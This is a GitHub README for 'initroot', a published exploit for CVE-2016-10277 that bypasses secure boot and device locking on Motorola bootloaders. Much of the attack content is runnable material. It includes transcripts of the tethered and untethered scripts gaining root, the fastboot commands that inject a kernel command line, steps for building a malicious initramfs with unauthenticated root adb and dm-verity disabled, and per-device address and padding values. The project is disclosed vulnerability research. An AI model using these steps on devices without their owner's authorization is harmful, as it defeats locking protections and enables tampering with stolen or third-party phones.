Skip to content
master
Go to file
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 
 
 

README.md

initroot: Motorola Bootloader Kernel Cmdline Injection Secure Boot & Device Locking Bypass (CVE-2016-10277)

By Roee Hay / Aleph Research, HCL Technologies

First stage exploit: Tethered jailbreak

This exploit gains an ephemeral unrestricted root access on the device. For example, on cedric (some messages were removed for readability):

$ cd ./tethered/cedric
$ ./initroot-tethered.sh
Welcome to initroot-cedric-tethered
...
(bootloader) <UTAG name="fsg-id" type="str" protected="false">
(bootloader)   <value>
(bootloader)     a initrd=0xA2100000,1588596
(bootloader)   </value>
(bootloader)   <description>
(bootloader)     FSG IDs, see http://goo.gl/gPmhU
(bootloader)   </description>
(bootloader) </UTAG>
OKAY [  0.015s]
finished. total time: 0.015s
target reported max download size of 536870912 bytes
sending 'aleph' (34319 KB)...
OKAY [  1.098s]
writing 'aleph'...
(bootloader) Invalid partition name aleph
FAILED (remote failure)
finished. total time: 1.101s
(bootloader) slot-count: not found
(bootloader) slot-suffixes: not found
(bootloader) slot-suffixes: not found
resuming boot...
OKAY [  0.006s]
finished. total time: 0.006s
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3014(readproc) context=u:r:shell:s0
$ adb shell
cedric:/ # 

Second stage exploit: Untethered jailbreak

This exploit gains a persistent root access on the device. For example, on athene (some messages were removed for readabilitiy):

$ cd ./untethered/athene
$ ./initroot-untethered.sh 
Welcome to initroot-athene-untethered
Welcome to initroot-athene-tethered
...
(bootloader) <UTAG name="fsg-id" type="str" protected="false">
(bootloader)   <value>
(bootloader)     a initrd=0x92000000,2505052
(bootloader)   </value>
(bootloader)   <description>
(bootloader)     FSG IDs, see http://goo.gl/gPmhU
(bootloader)   </description>
(bootloader) </UTAG>

OKAY [  0.015s]
finished. total time: 0.015s
target reported max download size of 536870912 bytes
sending 'aleph' (35214 KB)...
OKAY [  1.131s]
writing 'aleph'...
(bootloader) Invalid partition name aleph
FAILED (remote failure)
finished. total time: 1.138s
(bootloader) slot-count: not found
(bootloader) slot-suffixes: not found
(bootloader) slot-suffixes: not found
resuming boot...
OKAY [  0.006s]
finished. total time: 0.006s
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3014(readproc) context=u:r:kernel:s0
padC-initroot: 1 file pushed. 11.1 MB/s (22937600 bytes in 1.963s)
44800+0 records in
44800+0 records out
22937600 bytes transferred in 3.017 secs (7602784 bytes/sec)
...
(bootloader) <UTAG name="fsg-id" type="str" protected="false">
(bootloader)   <value>
(bootloader)     a rdinit= root=/dev/mmcblk0p41
(bootloader)   </value>
(bootloader)   <description>
(bootloader)     FSG IDs, see http://goo.gl/gPmhU
(bootloader)   </description>
(bootloader) </UTAG>

OKAY [  0.015s]
finished. total time: 0.015s
rebooting...

finished. total time: 0.815s
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3014(readproc) context=u:r:kernel:s0
athene:/ # 

Producing your own malicious initramfs archive

  1. Use the commited initroot-<device>.cpio.gz, or produce your own:
$ cd <initramfs folder>
$ find . | grep -v [.]$ | cpio -R root:root -o -H newc | gzip > ../initroot-<device>.cpio.gz
OR if padding is needed:
$ dd if=/dev/zero of=../pad ibs=1 count=<PAD_SIZE>
$ cp ../pad ../initroot-<device>.cpio.gz && find . | grep -v [.]$ | cpio -R root:root -o -H newc | gzip > ../tmp && ls -la ../tmp && cat ../tmp >> ../initroot-<device>.cpio.gz  && rm -fr ../tmp
$ cd ..
  1. Our commited initramfs images have adb running as root by default. It will not ask for authorization. In addition, dm-verity is disabled on the relevant partitions
fastboot oem config fsg-id "a initrd=<SCRATCH_ADDR+PAD_SIZE>,<initroot.cpio.gz size-PAD_SIZE>"`
fastboot flash foo initroot-<device>.cpio.gz`
fastboot continue
  1. if you use our initramfs, adb shell will now give you a root shell:
$ adb shell
shamu:/ # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc) context=u:r:su:s0

Creating an Untethered exploit for other Moto devices

Read our blog post

Verified Devices

Device Codename SCRATCH_ADDR PADDING committed initrams Unused Partition
Nexus 6 shamu 0x11000000 0x0 AOSP userdebug mmcblk0p11
Moto G5 (XT1676) cedric 0xA0100000 0x2000000 Release, patched init and adbd to disable SELinux, set{u,g}id to shell, capabilities drop and adb auth, etc mmcblk0p41
Moto G4 (XT1622) athene 0x90000000 0x2000000 "" mmcblk0p48

Community Reported

Device Codename SCRATCH_ADDR Reporter Description
Moto G5 Plus potter 0xA0100000 drbeat Injected boot property. [proof]
Moto G4 Play (XT1607) harpia 0x90000000 m-mullins Full Exploitation of Amazon XT1607. [proof]
Moto G4 Play (XT1609) harpia 0x90000000 @utoprime Full Exploitation of Verizon XT1609. [proof]
Moto G4 (XT1625) athene 0x90000000 @EWorcel Injected initrd that caused boot loops. [proof]
Moto G3 osprey 0x90000000 @asiekierka Injected initrd that caused boot loops. [proof]
Moto G2 (XT1072) thea 0x11000000 @TheElix Injected initrd caused boot loops. [proof]
Moto G (XT1032) falcon_retfr 0x11000000 Pierre Zurek Full Exploitation with 64MB padding [proof]
Moto E (XT830C) condor_cdma 0x0E000000 fetcher Full Exploitation of XT830C locked to Tracfone/Verizon with a 32MB padding [proof]
Other - - @jcase [proof]

Note

This vulnerability may affect other Motorola devices too: a different initramfs will be needed. A different physical address of initrd (SCRATCH_ADDR). PADDING may vary as well.

Video Demo

Video Demo of CVE-2016-10277

Publications

  1. initroot: Bypassing Nexus 6 Secure Boot through Kernel Command-line Injection
  2. initroot: Hello Moto
  3. Motorola Android Bootloader Kernel Cmdline Injection Secure Boot Bypass
  4. Untethered initroot (USENIX WOOT '17)
  5. USENIX WOOT '17 paper

About

Motorola Untethered Jailbreak: Exploiting CVE-2016-10277 for Secure Boot and Device Locking bypass

Resources

Releases

No releases published

Packages

No packages published

Languages

You can’t perform that action at this time.